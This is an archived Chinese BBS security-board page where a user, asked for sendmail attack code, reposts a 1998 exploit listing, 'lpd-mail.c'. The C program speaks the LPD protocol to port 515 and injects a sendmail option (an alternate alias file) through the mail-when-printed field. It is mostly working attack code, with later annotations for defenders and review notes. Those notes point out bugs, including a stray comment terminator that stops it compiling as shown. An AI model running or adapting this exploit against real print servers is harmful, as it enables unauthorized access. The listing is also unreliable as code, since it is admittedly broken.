<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="382.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦!!!), 信区: Security <br>
标 题: Re: 请问哪儿可以下载对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug 5 08:54:01 2000) <br>
<br>
[ http://www.rootshell.com/ ] <br>
From gamma@dac.org Fri Jul 17 12:49:48 1998 <br>
Date: Thu, 16 Jul 1998 23:36:27 +0100 (BST) <br>
From: Gamma <gamma@dac.org> <br>
To: info@rootshell.com <br>
Subject: More LPD fun <br>
/* <br>
** lpd-mail.c <br>
** <br>
** Experiments with the BSD-style 'lpd' protocol. <br>
** Gus '98 <br>
** <br>
** Modified by Gamma to support sending "Mail When Printed". Use <br>
** in conjunction with lpd-touch. <br>
** <br>
** Notes: Potential exploitation of lpd by specifying alternate <br>
** sendmail alias file to use etc. However, there are several <br>
** problems which come up to hinder progress. Here is <br>
** not the place to go into details, have a play around <br>
** yourself. <br>
** <br>
** Eg. ./lpd-mail localhost lp "-oA/var/spool/lpd/x" . <br>
** <br>
** Will attempt to use /var/spool/lpd/x@..db as an alternative <br>
** alias file. Downfall is you are unable to specify a <br>
** recipient to pass to sendmail, it gets run as uid 1 and <br>
** cannot write to /var/spool/mqueue. YMMV though depending <br>
** on the version of Sendmail running. Multiple versions <br>
** of Sendmail always drops setuid though so no matter what <br>
** alternate alias, sendmail.cf file you pass it, problems will <br>
** arise when it comes to writing to /var/spool/mqueue. <br>
** <br>
** References: RFC-1179 <br>
** <br>
** Greets: Gus for lpd-rm, pr0pane for mad discussions, Ao12M, #phuk <br>
** <br>
** lpd-mail.c Send mail when print job has finished <br>
** Usage: ./lpd-mail <target> <printer> <user> <userhost> <br>
** <br>
*/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <unistd.h> <br>
#include <fcntl.h> <br>
#include <sys/socket.h> <br>
#include <sys/types.h> <br>
#include <netinet/in.h> <br>
#include <netdb.h> <br>
#include <errno.h> <br>
<br>
/* Control codes for commands. No spaces unless specified <br>
** Values follow RFC 1179 (cited in the file header): the first three are <br>
** command octets sent on the wire, the single letters are control-file line <br>
** prefixes. LPD_RECIEVE_JOB and CMD_RECIEVE_CONTROL_FILE share the value 2 <br>
** because one is the daemon command and the other the receive-job subcommand. <br>
** For defenders: the operands of H, P and M come straight from the connecting <br>
** client, so a daemon has to validate them before handing them to a mailer. */ <br>
#define LPD_RECIEVE_JOB '\2' /* \2 printername <lf> */ <br>
#define CMD_RECIEVE_CONTROL_FILE '\2' /* \2 size <space> name <lf> */ <br>
#define CMD_RECIEVE_DATA_FILE '\3' /* \3 size <space> name <lf> */ <br>
#define CMD_CLASSNAME 'C' /* C classname <lf> */ <br>
#define CMD_HOSTNAME 'H' /* H hostname <lf> */ <br>
#define CMD_JOBNAME 'J' /* J jobname <lf> */ <br>
#define CMD_PRINTBANNERPAGE 'L' /* L username <lf> */ <br>
#define CMD_MAIL_WHEN_PRINTED 'M' /* M username@host <lf> */ <br>
#define CMD_SOURCEFILENAME 'N' /* N filename <lf> */ <br>
#define CMD_USERNAME 'P' /* P user-requesting-job <lf> */ <br>
#define CMD_UNLINK 'U' /* U filename <lf> */ <br>
#define CMD_PRINTFORMATTEDFILE 'f' /* f Filename of pre-formatted text */ <br>
void usage(char *); /* prints the usage line and exits */ <br>
int doit(int ,char *,char *, char *, char *); /* sock, printer, target, user, userhost */ <br>
int openhost (char *); /* returns a connected socket, or -1 */ <br>
int main (int argc, char *argv[]) { <br>
/* Entry point: takes <target> <printer> <user> <userhost> from argv, opens <br>
** the connection with openhost() and exits with the status of doit(). <br>
** The root check is presumably there because openhost() binds a source port <br>
** below 1024. The argv strings are forwarded unchecked; doit() writes user <br>
** verbatim into the control file's M line. */ <br>
int port,sock; /* port is set to 0 below and never read */ <br>
char *target,*printer,*user,*userhost; <br>
<br>
port = 0; <br>
target = printer = user = userhost = NULL; <br>
fprintf(stderr,"'lpd-mail.c' - Gus'98 with mods by Gamma\n"); <br>
if (argc < 5) usage(argv[0]); /* usage() calls exit(), so it does not return */ <br>
if (getuid() != 0) { <br>
fprintf(stderr,"You must be root to run this.\n"); <br>
exit(-1); <br>
} <br>
target = argv[1]; <br>
printer = argv[2]; <br>
user = argv[3]; <br>
userhost = argv[4]; <br>
if ((sock = openhost(target)) > 0) { /* a descriptor of 0 would be treated as failure */ <br>
exit(doit(sock,printer,target,user,userhost)); <br>
} else { <br>
exit(sock); /* openhost() reports failure as -1 */ <br>
} <br>
} <br>
<br>
int openhost (char *target) { <br>
/* Resolve target, bind a local source port in the RFC 1179 range and connect <br>
** to TCP port 515. Returns the socket on success, -1 if the name does not <br>
** resolve or connect() fails. <br>
** For defenders: a source port in this range shows only that the peer process <br>
** had root on its own host, so it should not be the sole access control in <br>
** front of the print service. <br>
** NOTE(review): socket() and bind() results are not checked, sa is not zeroed, <br>
** and memcpy is used although string.h is not among the includes above. <br>
** The second comment terminator after the source-port comment below is a <br>
** stray duplicate, so the listing does not compile as shown. */ <br>
int sock; <br>
struct hostent *he; <br>
struct sockaddr_in sa; <br>
int localport; <br>
<br>
he=gethostbyname(target); <br>
if(he==NULL) { <br>
fprintf(stderr,"Bad hostname"); <br>
return (-1); <br>
} <br>
<br>
/* <br>
** According to the RFC, the source port must be in the range <br>
** of 721-731 inclusive. <br>
*/ <br>
*/ <br>
srand(getpid()); /* seed depends only on the process id */ <br>
localport = 721 + (int) (10.0*rand()/(RAND_MAX+1.0)); /* yields 721..730, so 731 is never chosen */ <br>
<br>
sock=socket(AF_INET,SOCK_STREAM,0); <br>
sa.sin_addr.s_addr=INADDR_ANY; <br>
sa.sin_family=AF_INET; <br>
sa.sin_port=htons(localport); <br>
<br>
bind(sock,(struct sockaddr *)&sa,sizeof(sa)); /* result ignored; on failure connect() leaves from a port the kernel picks */ <br>
sa.sin_port=htons(515); /* sa is reused for the remote end, port 515 */ <br>
memcpy(&sa.sin_addr,he->h_addr,he->h_length); <br>
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0) { <br>
perror("Can't connect"); <br>
return (-1); /* sock is not closed on this path */ <br>
} else { <br>
fcntl(sock,F_SETFL,O_NONBLOCK); /* from here on read() on sock can return without data */ <br>
} <br>
printf("Source port: %d : Connected...\n",localport); <br>
return(sock); <br>
} <br>
int doit(int sock,char *printer,char *target, char *user, char *userhost) { <br>
/* Speak the receive-job exchange on sock: name the printer, then send a <br>
** control file with H, P, J, C, L, M and f lines followed by a zero octet. <br>
** No data file is sent and no acknowledgement is checked. Always returns 0; <br>
** write failures are only reported through perror(). <br>
** user is copied unmodified into the M (mail when printed) line. The file <br>
** header describes passing a sendmail option there, so a daemon that forwards <br>
** this operand to its mailer should reject values starting with '-' or <br>
** containing anything but plain user-name characters. <br>
** NOTE(review): the sprintf() calls into sendbuf are unbounded, so long <br>
** arguments overflow it; strlen is used although string.h is not among the <br>
** includes above. */ <br>
<br>
char hello[255]; <br>
char sendbuf[1024]; <br>
char respbuf[255]; <br>
/* Hello Mr LPD. Can I print to <printer> please ? */ <br>
sprintf(sendbuf,"%c%s\n",LPD_RECIEVE_JOB,printer); <br>
if ((write(sock,sendbuf,strlen(sendbuf)) != (strlen(printer)+2))) { /* expected: command octet + printer + LF */ <br>
perror("1 write"); <br>
} <br>
<br>
/* Why yes young man, what would you like me to do ? */ <br>
read(sock,respbuf,255); /* result ignored; respbuf is never NUL-terminated, and openhost() set O_NONBLOCK */ <br>
/* fprintf(stderr,": %s\n",respbuf); */ <br>
<br>
/* Would you be so kind as to carry out the commands in this file <br>
* as superuser without giving up any priviledges please ? <br>
*/ <br>
sprintf(sendbuf,"%c%s\n%croot\n%cmyjobname\n%c%s\n%croot\n%c%s\n%cdfA", <br>
CMD_HOSTNAME, <br>
userhost, <br>
CMD_USERNAME, <br>
CMD_JOBNAME, <br>
CMD_CLASSNAME, <br>
target, <br>
CMD_PRINTBANNERPAGE, <br>
CMD_MAIL_WHEN_PRINTED, <br>
user, <br>
CMD_PRINTFORMATTEDFILE); /* no LF follows the final "dfA" */ <br>
/* But of course young feller me lad! Security is for girls! */ <br>
sprintf(hello,"%c%d cfA12\n", <br>
CMD_RECIEVE_CONTROL_FILE, <br>
strlen(sendbuf)); /* size_t passed for %d */ <br>
printf("Sent hello.\n"); /* printed before the write below takes place */ <br>
if (write(sock,hello,strlen(hello)) != strlen(hello)) perror("2 write"); <br>
if (write(sock,sendbuf,strlen(sendbuf)+1) != (strlen(sendbuf)+1)) { /* +1 also sends the terminating NUL */ <br>
perror("3 write"); <br>
} <br>
printf("Sent command set.\n"); <br>
sleep(3); <br>
shutdown(sock,2); /* 2 shuts down both directions; the descriptor itself is not closed */ <br>
<br>
return (0); <br>
} <br>
void usage (char *name) { /* print the argument synopsis for program name to stderr, then exit with status 1 */ <br>
fprintf(stderr,"Usage: %s <target> <printer> <user> <userhost>\n",name); <br>
exit(1); <br>
} <br>
<br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>
<br>
<br>
-- <br>
</small><hr>
</table>
</body>
</html>